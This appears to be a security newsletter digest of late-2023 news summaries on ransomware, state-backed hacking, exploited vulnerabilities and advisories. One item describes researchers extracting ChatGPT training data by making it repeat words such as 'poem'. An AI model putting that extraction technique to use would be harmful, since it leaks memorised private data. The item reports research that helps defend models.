A regulatory agency in Florida confirmed they responded to a recent cyber attack last week as US cybersecurity agencies warn of foreign attacks against water utilities. A spokesperson for the St. Johns River Water Management District, which works closely with utilities on water supply issues, confirmed that it “identified suspicious activity in its information technology environment” and that “containment measures have been successfully implemented.”

Over 20,000 Vulnerable Microsoft Exchange Servers Exposed to Attacks

The ShadowServer Foundation is warning that tens of thousands of Microsoft Exchange email servers in Europe, the United States, and Asia are exposed on the public internet and vulnerable to remote code execution flaws. The mail systems run a software version that is currently unsupported and no longer receives any updates, being vulnerable to multiple security issues, some with a critical severity rating.

Check Point Research Navigates Outlook’s Security Landscape: The Obvious, the Normal, and the Advanced

In a recent blog from Check Point, Outlook, the desktop app in the Microsoft Office suite, is highlighted as one of the world's most widely used applications for organizational communication. However, it poses significant security risks, acting as a critical gateway for cyber threats. The blog categorizes attack vectors into three types: the "obvious" Hyperlink attack vector, the "normal" Attachment attack vector, and the "advanced" Email Reading and Special Object attack vectors.

Qakbot Takedown Aftermath: Mitigations and Protecting Against Future Threats

The DOJ and FBI collaborated to dismantle the Qakbot malware and its botnet, successfully disrupting a long standing threat. However, concerns linger as Qakbot may still pose a risk, although in a reduced form. The takedown removed the malware from a significant number of devices, including 700,000 globally and 200,000 in the U.S. Yet, recent findings suggest Qakbot remains active but weakened.

Simple Hacking Technique Can Extract ChatGPT Training Data

Researchers from Google DeepMind, Cornell University, and other institutions found that the widely used generative AI chatbot, ChatGPT, is susceptible to data leaks. By prompting ChatGPT to repetitively say words like "poem," "company," and others, the researchers were able to make the chatbot regurgitate memorized portions of its training data.

US Govt Sanctions North Korea’s Kimsuky Hacking Group

On Thursday the U.S. Department of Treasury’s Office of Foreign Assets Control (OFAC) sanctioned eight North Korean agents for facilitating sanctions evasion including revenue generation and missile-related technology procurement that support the Democratic People’s Republic of Korea’s (DPRK) weapons of mass destruction programs.

New ‘Turtle’ macOS Ransomware Analyzed

Several vendors on VirusTotal have detected a new ransomware dubbed Turtle which is capable of not only targeting Windows and Linux systems but also macOS. Cybersecurity researcher Patrick Wardle who analyzed this new strain, says that Turtle Ransomware is currently not sophisticated. The malware was developed in the Go programming language.

RedLine Stealer Malware Deployed Via ScrubCrypt Evasion Tool

Researchers from Satori Threat Intelligence discovered a new version of the ScrubCrypt obfuscation tool being used to target organizations with the RedLine stealer malware. This latest version of ScrubCrypt is for sale on dark web marketplaces, and is being used in account takeover and fraud attacks.

Behind the Attack: LUMMA Malware

Researchers at Perception Point recently unveiled a sophisticated malware attack aimed at bypassing threat detection systems. The attack involves impersonating a financial services company via a fake invoice email. The email includes a button that leads to an unavailable website which urges users to visit a seemingly legitimate link for the invoice.

Qlik Sense Exploited in Cactus Ransomware Campaign

According to a new blog post by researchers at Artic Wolf, a set of known vulnerabilities in Qlik Sense, a cloud analytics and business intelligence platform, are being exploited to deploy ransomware. Tracked as CVE-2023-41266, CVE-2023-41265, and CVE-2023-48365, the flaws are being chained together to achieve remote code execution on targeted systems.

Iran-Backed Cyber Av3ngers Escalates Campaigns Against U.S. Critical Infrastructure

The Iran-backed Cyber Av3ngers, affiliated with the IRGC, has been actively exploiting Programmable Logic Controllers (PLCs) in Water and Wastewater treatment plants, targeting critical infrastructure installations in the U.S. The group, known for making false claims, initiated attacks on various water authorities, an aquarium, and a brewery. They focus on Unitronics PLCs, leveraging open source tools and exploiting vulnerabilities. The recent campaign expanded to target critical infrastructure globally, particularly those using equipment associated with Israel.

New BLUFFS Attack Lets Attackers Hijack Bluetooth Connections

Researchers from Eurecom have developed six next attacks they have collectively named “BLUFFS.” These vulnerabilities can be used for device impersonation and man-in-the-middle (MitM) attacks. BLUFFS exploits two previously unknown flaws in Bluetooth, related to how session keys are derived to decrypt data in exchange.

Iranian Hackers Exploit PLCs in Attack on Water Authority in U.S.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is responding to a cyber attack on the Municipal Water Authority of Aliquippa, Pennsylvania. The attack involved the exploitation of Unitronics programmable logic controllers (PLCs) and has been attributed to the Iranian-backed hacktivist group Cyber Av3ngers.

General Electric, DARPA Hack Claims Raise National Security Concerns #2

General Electric (GE) and the Defense Advanced Research Projects Agency (DARPA) are reported to have experienced security breaches, with stolen data allegedly available for sale on the Dark Web. The compromised information includes access credentials, DARPA-related military data, SQL files, and more. GE has acknowledged the breach and is actively investigating the matter. DARPA, known for collaborating with GE on various projects, may have classified information on weapons programs and artificial intelligence research in its data stores.

General Electric, DARPA Hack Claims Raise National Security Concerns

General Electric, an American multinational conglomerate that has several divisions including aerospace, power, and renewable energy, is investigating claims that a threat actor breached its development environment and leaked allegedly stolen data. The development comes after a threat actor named IntelBroker posted to a dark forum claiming to have access to General Electric’s development and software pipelines.

Key Cybercriminals Behind Notorious Ransomware Families Arrested in Ukraine

A joint operation carried out by Europol and law enforcement agencies has led to the arrest of 5 key suspects in Ukraine believed to be core members of various ransomware operations including LockerGoga, MegaCortex, Dharma, and the now defunct Hive ransomware. Since 2019, these individuals have targeted over 1,800 victims across 71 countries, compromising large corporations.

Daixin Team Claims Attack on North Texas Municipal Water District

The Daixin Team, a group known for carrying out ransomware attacks, has listed the North Texas Municipal Water District (NTMWD) as a victim on their data leak site. The actors claim to have stolen large amounts of sensitive data from the company and are threatening to release it publicly. The information stolen is said to include board meeting minutes, internal project documentation, personnel details, audit reports, and more. The leak of the data puts the company at risk of frauds in the next months.

Hacktivists Breach U.S. Nuclear Research Lab, Steal Employee Data

The Idaho National Laboratory (INL) announced this week that they suffered a cyberattack after SiegedSec hacktivists leaked stolen human resources data online. INL is a nuclear research center run by the U.S. Department of Energy that employs 5,700 specialists in atomic energy, integrated energy, and national security.

Exploit for CrushFTP RCE Chain Released, Patch Now

A critical vulnerability (CVE-2023-43177) in CrushFTP, allowing hackers to access files, execute code, and steal passwords. Although a fix was issued in version 10.5.2, a recent public exploit by Converge demands immediate updates for CrushFTP users. This exploit lets attackers read, delete files, and potentially gain total control over systems using specific web ports and functions in CrushFTP.

8Base Group Deploying New Phobos Ransomware Variant via SmokeLoader

Last Friday, Cisco Talos published a blog post, highlighting that 8Base ransomware actors are using a variant of the Phobos ransomware to carry out financially motivated attacks. Although most Phobos variants have been distributed using SmokeLoader, a backdoor trojan, researchers note that in 8Base campaigns, the actors are embedding the ransomware component into encrypted payloads, which are then decrypted and loaded into the SmokeLoader process memory.

Popular Dragon Touch Tablet for Kids Infected with Corejava Malware

Retailers like Amazon have promoted affordable Android devices for children, such as the Dragon Touch KidzPad Y88X 10 tablet. However, research by the Electronic Frontier Foundation (EFF) revealed malware and riskware on the device, leading to Amazon removing it from the platform. Other Y88X models remain available. This is not the first instance; in January 2023, Amazon sold a T95 Android TV box with preinstalled malware. Both instances involved the Corejava malware.

MySQL Servers Targeted by ‘Ddostf’ DDoS-As-A-Service Botnet

The ‘Ddostf’ malware botnet is attacking MySQL servers to turn them into a DDoS service. AnhLab Security Emergency Response Center (ASEC) discovered this while tracking threats against database servers. Ddostf infiltrates MySQL servers either through vulnerabilities in unpatched systems or by cracking weak administrator account passwords. These attackers search the web for exposed MySQL servers, trying to breach them through brute forcing administrator credentials.

Beware: Malicious Google Ads Trick WinSCP Users into Installing Malware

Cybersecurity company Securonix has uncovered a new campaign dubbed SEO#LURKER, where actors are tricking WinSCP users into installing malware via SEO poisoning and bogus Google ads. In particular, the actors are using dynamic search ads which automatically generate ads based on a site's content to serve the malicious ads that take the victims to an infected site, which in this case is a compromised WordPress site (gameeweb[.]com). Researchers say this WordPress site will redirect the victim to a phishing site advertising a fake installation for WinSCP, in turn infecting the victim with malware.

#StopRansomware: Rhysida Ransomware

A new joint advisory from CISA and the FBI has been issued detailing observed TTPs and IOCs to help organizations protect against Rhysida Ransomware. Rhysida is a fairly new ransomware that was first detected in May 2023. Like any other ransomware gang, the group engages in double extortion schemes where it will encrypt and exfiltrate victims’ files, threatening to publish the data online unless a ransom is paid.

FBI Warns: Five Weeks In, Gaza Email Scams Still Thriving

FBI is warning of cybercriminals taking advantage of the war in Gaza to solicit funds from unsuspecting victims. According to alerts sent out by the agency, these fraudsters are using various schemes including emails, social media, cold calls, and websites masquerading as fundraisers and charities to convince end users to donate money, stating that the funds will go to victims of the ongoing conflict. These donations are requested in the form of gift cards, wire transfers, and cryptocurrency, making it difficult to trace back.

Zero-Days in Edge Devices Become China's Cyber Warfare Tactic of Choice

Over the past five years, Chinese state-sponsored cyber operations have evolved into a more mature and coordinated threat, focusing on exploiting both known and zero-day vulnerabilities in public-facing security and network appliances. They have also placed a strong emphasis on operational security and anonymity These changes have been influenced by both internal factors like military restructuring and changes in domestic regulations, as well as external factors including reporting by Western governments and the cybersecurity community.

LockBit Ransomware Exploits Citrix Bleed in Attacks, 10K Servers Exposed

About a month ago, Citrix fixed a critical information disclosure flaw (CVE-2023-4966), “Citrix Bleed,” impacting Citrix NetScaler ADC and NetScaler Gateway. As of writing thousands of internet-exposed endpoints are still running vulnerable appliances despite patches being released. As such threat actors are using this opportunity to launch attacks. One of these actors is the LockBit Ransomware group, which researchers say is using publicly available exploits for CVE-2023-4966 to breach the systems of large organizations, steal data, and encrypt files.

82% of Attacks Show Cyber-Criminals Targeting Telemetry Data

A new report from Sophos indicates that cyber-criminals are disabling or wiping out logs in 82% of incidents, making it difficult for organizations to backtrace and determine what happened on systems during a crisis. What’s more is that based on a case study conducted by Sophos, nearly a quarter of organizations investigated didn’t have the appropriate logging available in place for incident responders. Researchers say this was due to several factors, including insufficient retention, re-imaging, or a lack of configuration. “In an investigation, not only would this mean the data would be unavailable for examination, but the defenders would have to spend time figuring out why it wasn’t available” stated researchers in a recent blog post.

BlackCat Ransomware Gang Targets Businesses Via Google Ads

ALPHV/BlackCat ransomware threat actors have been seen using Google Ads to distribute malware. By masquerading as popular software products like Advanced IP Scanner and Slack, the group has been luring professionals to attacker controlled websites. The victims, thinking they are downloading legitimate software, are unknowingly installing a piece of malware called Nitrogen. Nitrogen serves as initial-access malware providing intruders with a foothold into the target organization’s IT environment.

Steps CISOs Should Take Before, During & After a Cyberattack

In today's complex cybersecurity landscape, cyberattacks are inevitable. Organizations, regardless of size or industry, must establish detailed playbooks for effective response. Chief Information Security Officers (CISOs) play a crucial role in preparing for attacks by fostering relationships, educating leaders, and developing comprehensive frameworks.

DP World Cyberattack Blocks Thousands of Containers in Ports

International logistics firm DP World Australia announced that a cyber attack has severely disrupted it’s regular freight movement in multiple Australian ports. DP World specialized in cargo logistics, port terminal operations, maritime services, and free trade zones, they have an annual revenue of over $10 billion. In total, the firm operates 82 marine and inland terminals in 40 countries, handles 70 million containers annually carried by 70,000 vessels, and manages roughly 10% of all global container traffic. DP World has the largest presence in Australia, handling over 40% of the nation’s container trade.

Update: Iranian Hackers Launch Malware Attacks on Israel’s Tech Sector

Imperial Kitten, also known as Tortoiseshell, TA456, Crimson Sandstorm and Yellow Liderc, has launched a new campaign targeting transportation, logistics, and technology companies in the Middle East. Associated with the Iranian Revolutionary Guard Corps (IRGC), this threat actor, using the online persona Marcella Flores, has been active since at least 2017, conducting cyberattacks across sectors like defense technology, telecommunications, maritime, energy, and consulting.

New Ransomware Group Emerges with Hive's Source Code and Infrastructure

Hunters International, a newly emerged ransomware group, has acquired the source code and infrastructure from the dismantled Hive operation, a once-prolific ransomware-as-a-service (RaaS) group. The Hive group's operations were halted as part of a coordinated law enforcement effort in January 2023. This move allowed Hunters International to start its own cyber threat activities with a mature toolkit.

Signature Techniques of Asian APT Groups Revealed

The Kaspersky Cyber Threat Intelligence team has unveiled crucial insights into the tactics, techniques and procedures (TTPs) employed by Asian Advanced Persistent Threat (APT) groups. In a report published today, Kaspersky reveals TTPs found from their examination of one hundred global cybersecurity incidents.

Dragos: OT Threat Intelligence in Cyber Assessment Framework (CAF)

Dragos recently highlighted the UK National Cyber Security Centre's Cyber Assessment Framework (CAF) in a report, emphasizing its global applicability. The CAF, designed to enhance government cybersecurity, outlines top-level outcomes for good cybersecurity. While initially aimed at the UK, its principles are valuable globally.

Russian-Speaking Threat Actor “Farnetwork” Linked to 5 Ransomware Gangs

According to a report from cybersecurity company Group-IB, a threat actor known as 'farnetwork' has operated under various usernames like farnetworkl, jingo, jsworm, razvrat, piparkuka, and farnetworkitand. They actively sought affiliates for different ransomware operations on Russian-speaking hacker forums. In March, farnetwork started recruiting affiliates for their ransomware-as-a-service (RaaS) program based on the Nokoyawa locker.

Beware, Developers: BlazeStealer Malware Discovered in Python Packages on PyPI

According to a new report from Checkmarx, throughout 2023 threat actors have been distributing malicious Python packages disguised as legitimate obfuscation tools to execute BlazeStealer malware on targeted systems. Once executed, BlazeStealer will retrieve a malicious script from an external source and run a discord bot designed to enable the threat actor to gain complete control over the victim’s computer.

Ransomware Actors Continue to Gain Access through Third Parties and Legitimate System Tools

According to a new advisory from the FBI, the agency noted that ransomware actors continue to gain access through third-party vendors and services. Between 2022 and 2023, the FBI observed ransomware attacks compromising casinos through third-party gaming vendors. In particular, small and tribal casinos were targeted, with the threat actors encrypting the PII data of employees and patrons which would be held for ransom payments.

Ethical Hackers Enhance Cybersecurity with Generative AI

The growing use of digital technology makes cybersecurity more important than ever. Ethical hackers, who identify and prevent cyber threats, are increasingly using AI tools like ChatGPT. A report by Bugcrowd reveals that many hackers believe AI will change how they work in the coming years. While AI can't replace human creativity in security, it helps in tasks like data analysis and vulnerability detection.

Okta Breach: Employee's Personal Google Account Usage on Company Laptop Blamed

In a recent statement from Okta security chief David Bradbury, Bradbury confirmed that from September 28, 2023, to October 17, 2023, a threat actor gained unauthorized access to files inside Okta’s customer support system associated with 134 Okta customers. These files contained session tokens, which the threat actor was able to use to hijack the legitimate Okta sessions of 5 customers.

Critical Atlassian Confluence Bug Exploited in Cerber Ransomware Attacks

Last Tuesday, Atlassian released security updates to address a critical improper authorization vulnerability impacting all versions of Confluence Data Center and Server. Tracked as CVE-2023-22518, the vulnerability can be used in data destruction attacks targeting internet-exposed and unpatched instances. While initially, Atlassian noted that it is unaware of reports of active exploitation, the vendor updated its advisory on Friday, stating that threat actors are starting to exploit the flaw in attacks in the wild.

Over Half of Users Report Kubernetes/Container Security Incidents

A report from Infosecurity magazine says that Cloud native development practices are creating dangerous new security blind spots for organizations in the US, UK, France and Germany. A study by Venafi polled 800 security and IT leaders from large organizations based in these four countries. It found that 59% of respondents have experienced security incidents in their Kubernetes or container environments.

A Ukrainian Company Shares Lessons in Wartime Resilience

MacPaw, a Ukrainian software company, faced the challenge of maintaining business continuity during the Russian invasion. Their CTO, Vira Tkachenko, explained how they prepared for wartime cyber resilience, including forming an emergency team, prioritizing employee safety and service delivery, fortifying their headquarters, ensuring power and connectivity options, building hardware reserves, setting up redundant communications, freezing code changes, and dealing with increased cyberattacks.

Adtran - AOE Server Vulnerability Advisory

AOE servers that are not properly secured are susceptible to a security vulnerability that could potentially grant unauthorized access to the server via the AOE Server Admin user account. Such compromised servers are consequently vulnerable to ransomware attacks, posing a significant security risk.

MITRE ATT&CK v14 Released

MITRE has released MITRE ATT&CK v14, the newest iteration of its popular investigation framework / knowledge base of tactics and techniques employed by cyber attackers. The goal of MITRE ATT&CK is to catalog and categorize the known tactics, techniques, and procedures (TTPs) used by adversaries in real-world attacks.

Common Vulnerability Scoring System v4.0 Summary:

FIRST, the Forum of Incident Response and Security Teams, will release this week version 4.0 of the Common Vulnerability Scoring System (CVSS). CVSS is an open framework that allows organizations and researchers to communicate specific characteristics and severities of software vulnerabilities.

Executive Order on the Safe, Secure, and Trustworthy Development and Use of Artificial Intelligence

President Joe Biden has signed an executive order aimed at regulating generative AI systems like ChatGPT, recognizing their transformative potential and potential risks. The order focuses on ensuring the safe and responsible development and use of AI. It directs various federal agencies and departments to create standards and regulations for AI in various areas, including criminal justice, education, health care, housing, and labor, with an emphasis on protecting civil rights and liberties.

Mass Exploitation of ‘Citrix Bleed’ Vulnerability Underway

Last week, Citrix warned that threat actors are actively exploiting a critical information disclosure vulnerability impacting Citrix NetScaler ADC and Gateway instances. Tracked as CVE-2023-4966, the vulnerability can be exploited by unauthenticated attackers to leak sensitive information from on-prem appliances that are configured as an AAA virtual server or gateway. In the past couple of days, security researchers have noticed an alarming increase in exploitation attempts, with several threat actors including ransomware groups, targeting vulnerable instances.

Dozens of Countries Will Pledge to Stop Paying Ransomware Gangs

As part of the upcoming third annual meeting of the International Counter-Ransomware Initiative, the Biden administration and dozens of its foreign allies will pledge to stop paying ransomware gangs. Representatives from 48 countries, the European Union, and Interpol are expected to attend this week’s summit, which will focus on strategies to block funds used by ransomware gangs to fuel their operations.

'Prolific Puma' Hacker Gives Cybercriminals Access to .us Domains

A report by Infoblox uncovers a concerning trend involving a link-shortening service called "Prolific Puma." This service assists cyber attackers and scammers by providing them with top-level .us domains, enabling them to run phishing campaigns with reduced visibility. Over the past 18 months, Prolific Puma has generated up to 75,000 unique domain names, often sidestepping regulations to offer malicious actors .us URLs.

Security Brief: TA571 Delivers IcedID Forked Loader

In a recent blog post, cybersecurity firm Proofpoint disclosed that it observed two campaigns on October 11 and 18, 2023, in which TA571, a sophisticated cybercriminal threat actor, delivered the Forked variant of IceID. The forked variant was observed being delivered via emails containing 404 TDS URLs that would lead to the download of a password-protected archive, with the password listed in the email. “The zip file contained a VBS script and a benign text file.

BiBi-Linux: A New Wiper Dropped By Pro-Hamas Hacktivist Group

Researchers at Security Joes have uncovered a new Linux Wiper malware dubbed “BiBi-Linux Wiper,” being used by a pro-Hamas Hacktivist group to target Israeli entities in the ongoing Israeli-Hamas conflict. BiBi-Linux Wiper is an x64 ELF executable that is designed to render files unusable by overwriting their contents, further appending targeted files with an extension that uses the following structure “[RANDOM_NAME].BiBi[NUMBER].”

OT Cyber Attacks Proliferating Despite Growing Cybersecurity Spend

The significant rise in attacks on operational technology (OT) systems is primarily due to two key factors: increasing global threats from nation state actors and the involvement of profit-driven cybercriminals often backed by the former. The lack of success in defending against these attacks can be attributed to several factors, including the complexity of OT environments, the convergence of information technology and OT, insider attacks, supply chain vulnerabilities, and more.

Russia to Launch Its Own Version of VirusTotal Due to US Snooping Fear

The Russian government is developing its own malware scanning platform, similar to VirusTotal, to address concerns that the U.S. government might access data from the popular Google-owned service. This new platform, called "Multiscanner," is being created by Russia's National Technology Center for Digital Cryptography in collaboration with other organizations and private enterprises, including companies like Kaspersky, AVSoft, and Netoscope.

CISA Releases Logging Made Easy Article

We wanted to let members know that CISA has introduced a valuable toolset designed to assist companies with their logging requirements. "Logging Made Easy (LME)," LME is a reimagined offering by CISA, that transforms a well-established log management solution into a reliable, centralized log management alternative.

A Cascade of Compromise: Unveiling Lazarus' New Campaign

Earlier this year, a software vendor fell victim to a Lazarus malware attack due to unpatched legitimate software. Despite previous warnings and patches from the vendor, vulnerabilities remained, allowing the threat actor to exploit them. Fortunately, proactive measures detected and thwarted an attack on another vendor. Further investigation revealed that the software vendor had been repeatedly targeted by Lazarus, indicating a persistent and determined threat actor likely seeking valuable source code or tampering with the software supply chain. The adversary used advanced techniques and introduced the SIGNBT malware for victim control.

Microsoft: Octo Tempest Is One of the Most Dangerous Financial Hacking Groups

Summary: Researchers at Microsoft released a comprehensive profile of Octo Tempest, a native English speaker known for advanced social engineering skills. Octo Tempest primarily focuses on data extortion and ransomware attacks against various companies. This threat actor’s tactics have been continuously evolving since early 2022, with expanded targeting encompassing organizations offering cable telecommunications, email, and tech services.

Cloudflare Sees Surge in Hyper-volumetric HTTP DDoS Attacks

Cloudflare says the number of hyper-volumetric HTTP DDoS (distributed denial of service) attacks recorded in the third quarter of 2023 surpasses every previous year, indicating that the threat landscape has entered a new chapter” (Bleeping Computer, 2023). DDoS attacks are a type of cyber attack that sends large amounts of traffic towards hosting apps, websites, and online services in an attempt to overwhelm and make them unavailable to legitimate visitors.

France Accuses Russian State Hackers of Targeting Government Systems, Universities, Think Tanks

A hacking group associated with Russia’s military intelligence agency has been spying on French universities, businesses, think tanks, and government agencies, according to a new report from France’s top cybersecurity agency ANSII” (The Record, 2023). According to the agency, APT28 (Fancy Bear) has been breaching French networks since the second half of 2021 looking for sensitive data. The group chose not to leverage backdoors and instead compromised devices like routers that aren’t as closely monitored.

Chilean Telecom Giant GTD Hit by the Rorschach Ransomware Gang

Chile's telecommunications company, Grupo GTD, has experienced a cyberattack that affected its Infrastructure as a Service (IaaS) platform. The attack caused disruptions to various online services, including data centers, internet access, and Voice-over-IP (VoIP). The attack has been attributed to the Rorschach ransomware gang, which has led to the disconnection of their IaSS platform from the internet.

StripedFly Malware Framework Infects 1 Million Windows, Linux Hosts

A sophisticated cross-platform malware platform named StripedFly flew under the radar of cybersecurity researchers for five years, infecting over a million Windows and Linux systems during that time. Kaspersky discovered the true nature of the malicious framework last year, finding evidence of its activity starting in 2017, with the malware wrongly classified as just a Monero cryptocurrency miner.

Israeli-Hamas Conflict Spells Opportunity for Online Scammers

Researchers have exposed multiple cyber scams exploiting the Israeli-Hamas conflict. These scams involve more than 500 deceptive emails and fraudulent websites that take advantage of people’s desire to support those affected by the conflict. Many of these emails contain links to counterfeit websites claiming to provide information about the ongoing situation and encouraging individuals to donate using various cryptocurrency payment methods, as reported by Kaspersky researchers.

Attacks on Web Applications Spike in Third Quarter, New Talos IR Data Shows

There was a notable increase in threats to web applications, accounting for 30 percent of the engagements Cisco Talos Incident Response (Talos IR) responded to in the third quarter of 2023, compared to 8 percent the previous quarter. Exploitation of public-facing applications was the top observed means of gaining initial access, accounting for 30 percent of engagements.

Citrix Bleed Exploit Lets Hackers Hijack NetScaler Accounts

A proof-of-concept (PoC) exploit is released for the 'Citrix Bleed' vulnerability, tracked as CVE-2023-4966, that allows attackers to retrieve authentication session cookies from vulnerable Citrix NetScaler ADC and NetScaler Gateway appliances. CVE-2023-4966 is a critical-severity remotely exploitable information disclosure flaw Citrix fixed on October 10 without providing many details.

ESET: Winter Vivern Exploits Zero-Day Vulnerability in Roundcube Webmail Servers

As per a report by ESET security, a well-known cybersecurity endpoint protection vendor, the threat actor identified as Winter Vivern, also known as TA473 and UAC-0114, has been detected exploiting a zero-day vulnerability in Roundcube webmail software on October 11, 2023, for the purpose of gathering email messages from victims' accounts. Telemetry data indicates that the campaign specifically aimed at Roundcube Webmail servers owned by governmental entities and a think tank, all located in Europe.

Strengthening Ransomware Defense: The Importance of Title Case Security Patch Management

A recent TrendMicro report highlights that IT teams are currently grappling with a deluge of software patches, which are being released on a regular basis, ranging from monthly to daily. As per statistics, contemporary enterprises are burdened with managing an average of 1,061 applications, and due to the frequent issuance of patches by various software vendors, the need for strategic prioritization has become imperative.

'Log in with...' Feature Allows Full Online Account Takeover for Millions

Security flaws in the use of OAuth by Grammarly, Vidio, and Bukalapak could potentially put the financial and credential information of millions of users at risk. These issues also raise concerns that other online services may face similar problems, potentially leading to account takeovers, credential theft, and financial fraud for users across various websites. Salt Labs researchers found serious API misconfigurations on websites like Grammarly, Vidio, and Bukalapak, indicating that numerous other sites might be similarly affected.

September Was a Record Month for Ransomware Attacks in 2023

Ransomware activity in September reached unprecedented levels following a relative lull in August that was still way above regular standards for summer months. According to NCC Group data, ransomware groups launched 514 attacks in September. This surpasses March 2023 activity, which counted 459 attacks, and was heavily skewed by Clop's MOVEit Transfer data theft attacks.

Vietnamese DarkGate Malware Targets META Accounts in the UK, USA, India

Cybersecurity firm WithSecure, has discovered a connection between recent DarkGate malware attacks targeting its clients and Vietnam-based threat actors engaged in a campaign to compromise Meta business accounts and pilfer sensitive data. WithSecure's Detection and Response Team (DRT) reported multiple DarkGate malware infection attempts against their clients' organizations in the UK, USA, and India on August 4, 2023. The attack methods closely resemble those seen in recent DuckTail infostealer campaigns, which WithSecure has been monitoring for over a year.

New TetrisPhantom Hackers Steal Data from Secure USB Drives on Govt Systems

A new sophisticated threat tracked as ‘TetrisPhantom’ has been using compromised secure USB drives to target government systems in the Asia-Pacific region. Secure USB drives store files in an encrypted part of the device and are used to safely transfer data between systems, including those in an air-gapped environment. Access to the protected partition is possible through custom software that decrypts the contents based on a user-provided password. One such software is UTetris[.]exe, which is bundled on an unencrypted part of the USB drive.

US Energy Firm Shares How Akira Ransomware Hacked its Systems

In a rare display of transparency, US energy services firm BHI Energy details how the Akira ransomware operation breached their networks and stole the data during the attack. BHI Energy, part of Westinghouse Electric Company, is a specialty engineering services and staffing solutions provider supporting private and government-operated oil & gas, nuclear, wind, solar, and fossil power generation units and electricity transmission and distribution facilities.

Google Chrome's New "IP Protection" Will Hide Users' IP Addresses

Google is set to introduce a new "IP Protection" feature in its Chrome browser to enhance user privacy by concealing their IP addresses through the use of proxy servers. This move aims to address privacy concerns related to IP addresses, which can be used for covert tracking, and marks Google's effort to strike a balance between user privacy and web functionality.

Tracking Unauthorized Access to Okta's Support System

In a recent statement from Okta Security, they've reported the discovery of malicious activity involving the unauthorized use of a stolen credential to access Okta's support case management system. The threat actor was able to access files uploaded by specific Okta customers as part of recent support cases. It's essential to clarify that the support case system operates independently of the primary Okta service, which remains fully functional and unaffected. Notably, the Auth0/CIC case management system has not been impacted by this incident.

Pro-Israeli Hacktivist Group 'Predatory Sparrow' Reappears

A hacktivist group supporting Israel, known as Predatory Sparrow, has resurfaced recently. Last week, the group broke its year-long silence by posting a tweet referencing the ongoing Gaza conflict, warning of its return and sharing a link to a report about the United States sending fighter planes and warships to aid Israel. Predatory Sparrow is recognized as a relatively advanced Israeli hacking operation, and it has a track record of conducting disruptive attacks in Iran, aimed at undermining the Iranian government.

ExelaStealer: A New Low-Cost Cybercrime Weapon Emerges

In a report from Fortinet, they detail a new information-stealing malware named ExelaStealer that has recently emerged in the cybersecurity landscape. ExelaStealer is described as a low-cost, mostly open-source infostealer with the option for paid customizations. This affordability and openness make it accessible to a wide range of cybercriminals, from novices to more seasoned threat actors. The malware is predominantly coded in Python and offers support for JavaScript. It possesses the capability to exfiltrate a variety of sensitive data, including passwords, Discord tokens, credit card information, cookies, session data, keystrokes, screenshots, and clipboard content.

Attacks on 5G Infrastructure from User Devices: ASN.1 Vulnerabilities in 5G Core

In a recent report from TrendMicro, researchers delve into critical vulnerabilities and risks associated with 5G and its infrastructure. They take a particular focus on the control plane and the susceptibility of the NGAP protocol to ASN.1-related issues. The first part of the report reveals how GTP-U tunnels can be exploited by user devices, potentially leading to core network crashes. In the second part, the report discusses how attackers can leverage these vulnerabilities by disguising control messages as user traffic, resulting in the transition from the user plane to the control plane.

North Korean Hackers Are Targeting Software Developers and Impersonating IT Workers

North Korean hackers have notably increased their emphasis on the IT industry, by infiltrating companies involved in software development and organizations seeking IT professionals. On Wednesday, Microsoft disclosed that North Korean affiliated hacking groups Lazarus (Diamond Sleet) and Andariel (Onyx Sleet) have been exploiting a critical authentication bypass vulnerability (CVE-2023-42793) within JetBrains TeamCity server.

QR Codes Used in 22% of Phishing Attacks

Hoxhunt released the results of their Hoxhunt Challenge, an exercise conducted in 38 organizations across nine industries and 125 countries. Their study revealed that 22% of phishing attacks in the first weeks of October 2023 used QR codes to deliver malicious payloads.

E-Root Admin Faces 20 Years for Selling Stolen RDP, SSH Accounts

Sandu Diaconu, the operator of the E-Root marketplace, has been extradited to the U.S. to face a maximum imprisonment penalty of 20 years for selling access to compromised computers. The Moldovan defendant was arrested in the U.K. in May 2021 while attempting to flee the country following the authorities' seizure of E-Root's domains in late 2020. Last month, Diaconu consented to be extradited to the United States for wire fraud, money laundering, computer fraud, and access device fraud

Iran-Linked OilRig Targets Middle East Governments in 8-Month Cyber Campaign

The OilRig threat group, connected to Iran, conducted an eight-month-long cyber campaign against an unspecified Middle Eastern government from February to September 2023. This operation resulted in the theft of files and passwords, and at one point, they used a PowerShell backdoor called PowerExchange. The Symantec Threat Hunter Team refers to this operation as "Crambus." The attackers used the PowerExchange implant to monitor emails from an Exchange Server, execute commands, and send the results to themselves. They compromised at least 12 computers and installed backdoors and keyloggers on an additional dozen machines, indicating a significant breach.

The Iron Swords War – Cyber Perspectives from the First 10 Days of the War in Israel

In a recent report from Check Point, the focus is on escalating cyber activities during the Israel-Hamas conflict. The key points include a surge in cyberattacks targeting Israel, diverse cyber threats like DDoS attacks and hack-and-leak incidents, and the involvement of various hacktivist groups aligned with geopolitical interests. These developments are causing heightened risks and tensions in the cyber domain.

Multiple North Korean Threat Actors Exploiting the TeamCity CVE-2023-42793 Vulnerability

wo North Korean nation-state actors, Lazarus (or Zinc) and Plutonium (or Andariel), have been exploiting a known remote code execution vulnerability in the TeamCity continuous integration and continuous deployment tool. The vulnerability, CVE-2023-42793, was patched by JetBrains in version 2023.05.4. These actors have been targeting on-premises instances of TeamCity, deploying backdoors, stealing credentials, and more. Microsoft's threat intelligence group observed these attacks and noted that both groups may be opportunistically compromising vulnerable servers, but they have also used techniques that could provide persistent access to victim environments.

Ex-Navy IT Head Gets 5 Years for Selling People’s Data on Darkweb

Marquis Hooper, a former U.S. Navy IT manager, has received a sentence of five years and five months in prison for illegally obtaining US citizens' personally identifiable information (PII) and selling it on the dark web. The man was indicted with his wife, Natasha Renee Chalk, in February 2021 and pleaded guilty to aggravated identity theft and conspiracy to commit wire fraud in March 2023.

Ukrainian Activists Hack Trigona Ransomware Gang, Wipe Servers

A group of cyber activists under the Ukrainian Cyber Alliance (UAC) banner has hacked the servers of the Trigona ransomware gang and wiped them clean after copying all the information available. The Ukrainian Cyber Alliance fighters say they exfiltrated all of the data from the threat actor’s systems, including source code and database records, which may include decryption keys.

D-Link Confirms Data Breach after Employee Phishing Attack

Taiwanese networking equipment manufacturer D-Link confirmed a data breach linked to information stolen from its network and put up for sale on BreachForums earlier this month. The attacker claims to have stolen source code for D-Link's D-View network management software, along with millions of entries containing personal information of customers and employees, including details on the company's CEO.

Critical Vulnerabilities Expose Weintek HMIs to Attacks

